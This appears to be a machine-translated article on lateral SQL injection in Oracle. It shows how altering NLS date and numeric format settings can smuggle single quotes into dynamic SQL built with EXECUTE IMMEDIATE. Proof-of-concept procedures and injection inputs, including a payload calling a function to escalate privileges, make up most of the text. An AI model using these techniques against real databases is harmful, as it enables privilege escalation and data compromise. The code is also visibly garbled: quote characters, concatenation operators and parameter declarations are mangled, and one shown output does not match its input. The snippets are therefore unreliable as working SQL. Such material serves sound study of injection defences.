If you directly execute SQL statements or bind parameters, you don't have to worry too much,
See the following ORACLE stored procedures
Create or replace procedure kjdatepoc (date d)
As
Begin
Insert into kjdatetable values (d );
Commit;
End;
There is no need to worry about new SQL injection attacks. Where will the injection attacks of DATE and NUMBER occur !? Generally, dynamic SQL statements are used without parameter binding.
For example, DBMS_ SQL or EXECUTE IMMEDIATE that engineers often use
See the following stored procedure
Create or replace procedure kjdatepoc (date d)
As
Begin
Execute immediate 'insert into kjdatetable values ('| d | ')';
Commit;
End;
In this case, you can modify the value of NLS_DATE_FORMAT in the SESSION to execute SQL injection in the stored procedure or function,
PAPER from foreigners is very detailed. I am not talking nonsense here.
However, there is not much explanation for NUMBER injection, but it simply demonstrates that single quotes can be output!
See the following statements
Alter session set NLS_NUMERIC_CHARACTERS = "'.';
SELECT to_number (1000.10001, '999999d9999999') | "from dual;
Output result
1000 '10001
There is only one more single quotation mark. What is the purpose? Optimistic! It is very valuable in specific situations! Take a look at the next Stored Procedure
Create or replace procedure NumInjPoc (kjexpnum number, kjexpstr varchar2)
Is
SecStr varchar2 (1000 );
Begin
SecStr: = replace (kjexpstr ,"",""");
Sys. dbms_output.put_line ('select * from dual where id = '| kjexpnum |' and name = "'| SecStr | "");
End;
The varchar type is replaced internally! We can perform tests.
Begin
Numinjpoc (1000 ,"'-');
End;
The output SQL statement is
SELECT * from dual where id = 1000 and name = "'-'
The single quotation mark is escaped.
So how can we inject this NUMBER type?
Alter session set NLS_NUMERIC_CHARACTERS = "'.';
Begin
Numinjpoc (TO_NUMBER (0.10001, '9999d9999999'), '| kj. exp ()-');
End;
View output results
SELECT * from dual where id = '2014 and name = '| kj. exp ()-'
In this way, we can attack it indirectly...
To a certain extent, the system only needs to use alter session to attack some functions or processes in the system to improve the permissions. It is not a good idea to break through, but for SQL injection attacks on a single statement, the result is the wizard! This method does not work much.